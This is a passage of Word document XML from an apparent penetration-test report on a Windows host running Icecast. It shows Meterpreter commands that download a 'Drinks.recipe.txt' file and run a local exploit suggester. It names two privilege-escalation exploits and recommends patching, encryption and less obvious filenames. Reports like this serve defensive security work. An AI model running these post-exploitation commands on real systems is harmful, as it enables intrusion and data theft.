      </w:r>
    </w:p>
    <w:p w14:paraId="265210E9" w14:textId="77777777" w:rsidR="00A60ACD" w:rsidRPr="006164D0" w:rsidRDefault="00A60ACD" w:rsidP="00A60ACD">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006164D0">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>download Drinks.recipe.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136C5CDB" w14:textId="10D185C0" w:rsidR="00A60ACD" w:rsidRDefault="00A60ACD" w:rsidP="00A60ACD">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5104C175" wp14:editId="3E7E93E0">
            <wp:extent cx="4772025" cy="3181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181350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="63BD4CAD" w14:textId="7F584FE0" w:rsidR="00484430" w:rsidRDefault="00A60ACD" w:rsidP="00484430">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A60ACD">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Vulnerabilities Found:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014015EB" w14:textId="77777777" w:rsidR="00A60ACD" w:rsidRDefault="00A60ACD" w:rsidP="00A60ACD">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F231C2">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>run post/multi/recon/local_exploit_suggester</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D94A31D" w14:textId="77777777" w:rsidR="00A60ACD" w:rsidRDefault="00A60ACD" w:rsidP="00A60ACD">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4D2E00A0" w14:textId="121EB0EE" w:rsidR="00A60ACD" w:rsidRDefault="00A60ACD" w:rsidP="00A60ACD">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00745A2D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Meterpreter discovered two possible vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E7664DD" w14:textId="77777777" w:rsidR="00745A2D" w:rsidRPr="00745A2D" w:rsidRDefault="00745A2D" w:rsidP="00A60ACD">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79FD30A5" w14:textId="0CBE7EAA" w:rsidR="00A60ACD" w:rsidRDefault="00745A2D" w:rsidP="00484430">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="030E00F3" wp14:editId="4B471ECD">
            <wp:extent cx="5861050" cy="28892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1050" cy="2889250"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5491FC44" w14:textId="77777777" w:rsidR="00745A2D" w:rsidRPr="00745A2D" w:rsidRDefault="00745A2D" w:rsidP="00745A2D">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00745A2D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The two exploits of concern are</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F87987D" w14:textId="77777777" w:rsidR="00745A2D" w:rsidRPr="00745A2D" w:rsidRDefault="00745A2D" w:rsidP="00745A2D">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00745A2D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ikeext_service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF1E0CF" w14:textId="77777777" w:rsidR="00745A2D" w:rsidRPr="00745A2D" w:rsidRDefault="00745A2D" w:rsidP="00745A2D">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00745A2D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ms16-075</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4A202B" w14:textId="77777777" w:rsidR="00745A2D" w:rsidRPr="00745A2D" w:rsidRDefault="00745A2D" w:rsidP="00745A2D">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FC0E997" w14:textId="77777777" w:rsidR="00745A2D" w:rsidRPr="00745A2D" w:rsidRDefault="00745A2D" w:rsidP="00745A2D">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00745A2D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The ikeext services exploit module exploits a missing DLL loaded by the 'IKE and AuthIP Keyring Modules' (IKEEXT) service which runs as SYSTEM, and starts automatically in default installations of Vista-Win8. It requires an insecure bin path to plant the DLL payload.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CE02C6" w14:textId="77777777" w:rsidR="00745A2D" w:rsidRPr="00745A2D" w:rsidRDefault="00745A2D" w:rsidP="00745A2D">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="784D3341" w14:textId="77777777" w:rsidR="00745A2D" w:rsidRPr="00745A2D" w:rsidRDefault="00745A2D" w:rsidP="00745A2D">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00745A2D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The ms16-075 exploit is a security update that resolves a vulnerability in Microsoft Windows that could allow elevation of privilege if an attacker logs on to the system and runs a specially crafted application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B42FD6" w14:textId="77777777" w:rsidR="00745A2D" w:rsidRPr="00A64032" w:rsidRDefault="00745A2D" w:rsidP="00745A2D">
      <w:pPr>
        <w:pStyle w:val="PlainText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15DF3FEA" w14:textId="1E97B966" w:rsidR="00A60ACD" w:rsidRPr="00A60ACD" w:rsidRDefault="00745A2D" w:rsidP="00484430">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3DB04769" wp14:editId="2EB05A51">
            <wp:extent cx="5865495" cy="384048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5495" cy="3840480"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>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3D35FC2A" w14:textId="2A3A6977" w:rsidR="00484430" w:rsidRDefault="00335754" w:rsidP="00745A2D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>I recommend that the Icecast Server is immediately patched to the latest release. According to icecast.org the current release is 2.4.4</w:t>
      </w:r>
      <w:r w:rsidR="006E4FAE">
        <w:t xml:space="preserve"> (October 2020).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71866390" w14:textId="77777777" w:rsidR="009E6115" w:rsidRDefault="009E6115" w:rsidP="00745A2D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Choice of filenames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCC2C5F" w14:textId="7BBDB9F0" w:rsidR="00745A2D" w:rsidRDefault="009E6115" w:rsidP="009E6115">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>I suggest either encrypting sensitive data files, and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13685BD9" w14:textId="07768DB4" w:rsidR="009E6115" w:rsidRPr="00484430" w:rsidRDefault="009E6115" w:rsidP="009E6115">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use an internal file naming protocol that only senior management are aware of – something much less obvious than “Drinks.Recipe”</w:t>
      </w:r>
      <w:r w:rsidR="007041BE">
        <w:t xml:space="preserve"> and “secret”</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5998728D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="807EEC2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63C5552"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DE863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0A0FA3"/>
    <w:rsid w:val="00335754"/>
    <w:rsid w:val="003363AA"/>
    <w:rsid w:val="00484430"/>
    <w:rsid w:val="00586D5E"/>
    <w:rsid w:val="00610ACF"/>
    <w:rsid w:val="006D748D"/>
    <w:rsid w:val="006E4FAE"/>
    <w:rsid w:val="007041BE"/>
    <w:rsid w:val="00745A2D"/>
    <w:rsid w:val="00925E3B"/>
    <w:rsid w:val="009B68CD"/>
    <w:rsid w:val="009E6115"/>
    <w:rsid w:val="00A60ACD"/>
    <w:rsid w:val="00A734A3"/>
    <w:rsid w:val="00B203F3"/>
    <w:rsid w:val="00B3293C"/>
    <w:rsid w:val="00BC4C7A"/>
    <w:rsid w:val="00CF3B9C"/>
    <w:rsid w:val="00E12A60"/>
    <w:rsid w:val="00EF1EF3"/>
    <w:rsid w:val="00F77419"/>
    <w:rsid w:val="00FF7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419"/>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paragraph" w:styleId="PlainText">
    <w:name w:val="Plain Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PlainTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A60ACD"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="en-AU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="PlainTextChar">
    <w:name w:val="Plain Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="PlainText"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00A60ACD"/>
    <w:rPr>
      <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
      <w:sz w:val="21"/>
      <w:szCs w:val="2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vedetails.com/vulnerability-list/vendor_id-693/Icecast.html" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:paulbarrett@GoodSecurity.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9</Pages>
  <Words>575</Words>
  <Characters>3282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Paul Barrett</cp:lastModifiedBy>
  <cp:revision>18</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-04-13T16:25:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-11-05T06:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>